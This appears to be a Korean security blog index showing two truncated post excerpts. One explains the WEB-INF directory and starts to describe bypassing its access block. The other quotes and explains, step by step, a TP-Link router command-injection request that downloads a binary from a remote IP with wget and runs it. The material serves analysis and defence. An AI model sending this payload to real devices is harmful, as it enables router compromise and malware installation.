![]()
WEB-INF란?WEB-INF는 웹 어플리케이션 환경설정 정보와 자바 class 파일들이 위치하는 특별한 디렉토리로 보안상 클라이언트의 직접적인 접근이 불가능한 디렉터리이다 이 때문에, 서버는 /WEB-INF/에 대한 직접 요청에 대해서 대개 '403 forbidden' 이나 심지어는 '404 Not Found' 등의 HTTP 에러 메시지를 반환한다. /WEB-INF/web.xml\WEB-INF 디렉토리 하의 web.xml 파일은 URL 매핑, 서블릿 등록정보, welcome 파일 목록, MIME 형식, 에러 페이지, security 등 웹 서버에 대한 정보 및 환경 설정 정보들을 담고 있다. 그러나, 이처럼 접근이 차단되어 있는 'WEB-INF' 디렉토리도 다음 예와 같이 WEB-INF 뒤에 '.' 를..
![]()
http://cgi-bin/luci/;stok=locale?form=country&operation=write&country=$(id%3E`cd/tmp; rm -rf shk; wget http://45.87.154.160/shk; chmod 777 shk; ./shk tplink; rm -rf shk`) cd /tmp: /tmp 디렉토리로 이동 rm -rf shk: shk 이름의 파일 또는 디렉토리를 재귀적으로 삭제 wget http:// 45.87.154.160/shk: 원격 서버에서 shk 파일 다운로드 받음 chmod 777 shk: shk 파일에 대한 권한을 변경하여 실행 가능한 파일로 만든다 ./shk tplink: 다운로드 받은 shk 파일을 실행하며, tplink 라는 인자를 전달하여 실행됨..
